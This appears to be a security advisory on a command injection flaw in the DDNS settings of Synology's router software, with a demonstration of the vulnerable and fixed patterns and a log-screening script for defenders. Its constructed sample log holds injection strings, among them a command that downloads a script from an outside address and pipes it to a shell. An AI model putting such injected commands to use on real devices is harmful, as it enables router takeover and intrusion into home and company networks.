CVE-2024-53286
Synology · Synology Router Manager (SRM)
A high-severity vulnerability exists in multiple Synology router products, allowing for remote command execution.
Executive summary
CVE-2024-53286 is a high-severity OS command injection in the Dynamic DNS (DDNS) feature of Synology Router Manager (SRM), affecting multiple Synology router products. An attacker who can edit DDNS records through the SRM web interface can inject shell commands that run on the device, potentially leading to a complete compromise of the router. A successful attack hands the adversary the network gateway, from which they can intercept traffic, attack other devices on the network, and disrupt internet access.
Vulnerability
The vulnerability is an OS command injection flaw in the DDNS Record functionality of the SRM web interface. The software does not properly sanitize user-supplied input in the DDNS configuration fields before passing it to a system shell, so the values are interpreted as shell syntax rather than as plain data. An authenticated attacker with rights to configure DDNS records can craft a value containing shell metacharacters (e.g., ;, |, &&, $( )) followed by OS commands, which the underlying operating system then executes with the privileges of the SRM service. Because the injection point is a legitimate configuration field, no memory corruption or exploit chain is needed: the payload is simply saved through the normal DDNS form.
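The following Python snippet is an added illustration of the injection pattern described above and of the fix a vendor would apply. It is not Synology's code (SRM's DDNS implementation is not public); the hostname is fed to a harmless echo command standing in for the real DDNS update tool, and the metacharacter payload is constructed for the example.

```python
"""Added illustration of OS command injection via a DDNS hostname field.

Not Synology's code. `echo` is a placeholder for whatever update tool the
router invokes; the point is how the hostname reaches the shell, not which
binary runs. Requires /bin/sh (any Linux or BSD host).
"""
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters total at most.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def update_ddns_vulnerable(hostname: str) -> str:
    """Vulnerable pattern: the hostname is concatenated into a command string
    that /bin/sh parses, so ; | && $( ) and backticks are honoured."""
    cmd = "echo updating " + hostname  # placeholder for the real update tool
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def update_ddns_hardened(hostname: str) -> str:
    """Hardened pattern: allow-list validation, then execution without a shell.
    The hostname becomes one argv element and is never parsed for metacharacters."""
    if not HOSTNAME_RE.match(hostname):
        raise ValueError(f"invalid DDNS hostname: {hostname!r}")
    proc = subprocess.run(
        ["echo", "updating", hostname], capture_output=True, text=True
    )
    return proc.stdout


if __name__ == "__main__":
    benign = "home.example.com"
    # Constructed payload: a metacharacter terminates the intended command and
    # an attacker-chosen command follows it.
    payload = "home.example.com; echo INJECTED"

    print(update_ddns_vulnerable(benign), end="")
    print(update_ddns_vulnerable(payload), end="")  # second line: INJECTED ran
    print(update_ddns_hardened(benign), end="")
    try:
        update_ddns_hardened(payload)
    except ValueError as exc:
        print("rejected:", exc)
```

Of the two layers in the hardened version, the argv-list call is what actually removes the vulnerability: without a shell there is nothing to interpret the metacharacters, and the payload would be passed to the tool as a literal (and useless) hostname. The allow-list check is defence in depth; it also stops values that are harmless to the shell but would confuse the downstream update client.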
Business impact
This vulnerability is rated High severity with a CVSS score of 7.2; that score already accounts for the attacker needing an authenticated account with rights to edit DDNS records. A compromised router is a critical failure of the network perimeter. Exploitation can cost data confidentiality through traffic interception (man-in-the-middle attacks), integrity because an attacker can modify data in transit, and availability because the attacker can disrupt network services. The router also makes a convenient pivot point for attacks against internal network assets, so the flaw is a severe risk to the organization's overall security posture.
Remediation
Immediate Action: Update SRM to the fixed version named in Synology's advisory for this CVE as soon as possible. After patching, review the router's system and access logs for unauthorized activity or attempted exploitation that may have occurred before the update, paying particular attention to DDNS configuration changes.
Proactive Monitoring: System administrators should watch for indicators of compromise. This includes reviewing SRM logs for unusual or malformed DDNS configuration entries (hostnames containing shell metacharacters, or values that are not syntactically valid hostnames), watching the router for unexpected outbound connections, and checking for unauthorized processes running on the device. A Network Intrusion Detection System (NIDS) can be configured to alert on common command injection patterns in requests to the router's management interface; note that this only works where the NIDS can see the request body, so management traffic served over TLS needs inspection at the TLS termination point rather than on the wire.
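As an added example of the log review recommended above, the screen below flags DDNS record changes whose hostname contains shell metacharacters or characters that cannot occur in a valid hostname. It is not Synology's tooling and the log lines are constructed for the example; SRM's real log layout is not shown on this page, so the RECORD_RE pattern would need adapting to the actual format.

```python
"""Added example: screening DDNS configuration log entries for command
injection attempts. Not Synology's tooling; the sample lines below are
constructed and do not reproduce SRM's actual log format.
"""
import re
from dataclasses import dataclass

# Constructed sample log. Two benign updates, two injection attempts.
SAMPLE_LOG = """\
2024-12-01T09:12:44 admin@192.168.1.20 ddns: update record hostname="home.example.com" provider="example"
2024-12-01T09:13:10 admin@203.0.113.7 ddns: update record hostname="home.example.com;wget http://203.0.113.7/x|sh" provider="example"
2024-12-01T09:14:02 admin@192.168.1.20 ddns: update record hostname="office.example.net" provider="example"
2024-12-01T09:15:31 admin@203.0.113.7 ddns: update record hostname="$(id>/tmp/o)" provider="example"
"""

# Assumed line layout for the constructed log: timestamp, user@source, message.
RECORD_RE = re.compile(
    r'^(?P<ts>\S+) (?P<user>\S+) ddns: update record hostname="(?P<host>[^"]*)"'
)
# Characters the Bourne shell treats specially. Any one of them in a hostname
# field is a strong signal on its own.
SHELL_META = set(";|&$`(){}<>\n'\"\\")
# Coarse hostname alphabet; anything outside it is at least malformed.
HOST_CHARS_RE = re.compile(r"^[A-Za-z0-9.-]+$")


@dataclass
class Finding:
    timestamp: str
    source: str
    hostname: str
    reason: str


def screen_ddns_log(text: str) -> list[Finding]:
    """Return one Finding per DDNS update whose hostname looks like an
    injection attempt or is otherwise not a valid hostname."""
    findings: list[Finding] = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # not a DDNS record change; other events are out of scope here
        host = m.group("host")
        meta = sorted(c for c in set(host) if c in SHELL_META)
        if meta:
            reason = "shell metacharacters: " + " ".join(meta)
        elif not HOST_CHARS_RE.match(host):
            reason = "non-hostname characters"
        else:
            continue
        findings.append(Finding(m.group("ts"), m.group("user"), host, reason))
    return findings


if __name__ == "__main__":
    for f in screen_ddns_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.source} {f.reason}: {f.hostname!r}")
```

The source field is worth keeping in the output: in the constructed sample both suspicious changes come from an address outside the LAN, which is exactly the pattern the access restriction under Compensating Controls is meant to prevent. A finding with an internal source is still an incident, since the exploit requires an authenticated account and that account may be compromised.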
Compensating Controls: If immediate patching is not feasible, implement the following controls to reduce the risk of exploitation:
- Restrict access to the SRM management interface to a minimal set of trusted IP addresses, and do not expose it to the WAN.
- If the DDNS functionality is not required for business operations, disable it entirely, which removes the injection point.
- Since exploitation requires an authenticated account that can edit DDNS records, keep the number of such accounts to a minimum and ensure each uses a strong, unique password.
Exploitation status
Public Exploit Available: false
Analyst recommendation
Given the high severity of this vulnerability and its location on a critical perimeter device, immediate remediation is strongly recommended. Organizations should prioritize deploying the vendor's security patch across all affected Synology routers. Although this CVE is not currently on the CISA KEV list, a command injection flaw in a network device is a highly attractive target, and the authentication requirement is a weaker barrier than it sounds wherever router credentials are shared, reused or exposed. Proactive patching is the most effective defense against potential exploitation.